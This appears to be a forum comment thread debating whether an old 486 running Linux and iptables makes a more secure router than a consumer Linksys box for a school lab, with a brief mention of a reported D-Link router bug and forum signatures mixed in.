Time to set up 486 securely: 1 hr. - several days.
Not everyone knows how to set up a linux router securely. Some people might think they do, but they could be wrong. According to who? Not that you're wrong, but you cite no facts. It seems like it is just your opinion.
Ok, I admit. I did post my opinion, which is based upon experience both with the router in question, and several NAT boxes I've setup using old peecees and iptables. I base my statement on security on the returns I get when I nmap one of my NAT boxes versus the linky router I use at home. Five million versus fourteen (not thousand or million, just 14). And yes, I do patch all of the hardware I have to take care of. :)
So, opinion, yes, based on experience, yes as well. One side issue: It's a hell of a lot harder for a student to walk out of a lab unnoticed with a 486 (assuming that student would even want to do so which seems unlikely to me) versus slipping a BESFR41 into his backpack. So there's that layer of security as well... although that same student would probably swipe the switch now that I think of it
political_news.c: warning: comparison is always true due to limited range of data type
A similar problem exists on the D-Link DI-704P router/firewall. Essentially, any http request not formated exactly as the router expects causes the router to stop handling packets for several minutes. I reported this bug to D-Link, but was told the problem does not exist, despite the fact that other people were able to recreate the problem! KDE Bug #40538 has the details as the konquer browser triggers the problem.
Come test your mettle in the world of Alter Aeon!
Granted, there doesn't appear to be anything of real value there now, but that may change now that OpenNIC is available to every Linksys customer out there.
And the men who hold high places must be the ones who start
To mold a new reality... closer to the heart
...but my ISP DOS'es me more than any script kiddie could ever hope to.
YooHoo/2U2
Can be found here. Sorry if this duplicates anyone else's post. I don't have time to read everything.
-Guanno
Space & noise. And set up. And redundancy. We already use Linux servers to provide DNS & file sharing. I suppose we could just pile it all on one Linux box, but if we did that, the Linux server is just one more single point of failure. We use jet directs, too, and we could run that off the Linux server if we wanted to...but if the server crashes, we still have Internet & printing, if the Linksys crashes, a simple line change on the server activates DHCP and we're still up internally, although we have no Internet...you get the picture. Short version, we're on a budget and we don't want a pile of power-hungry computers when a litte Linksys does what we want to, and quite nicely. And, in a pinch, we could always fire up the proxy functions of the server. Hasn't happened yet, though. We've had server hard drives die, but we've never had a Linksys fail in the lab - although one or two have been DOA.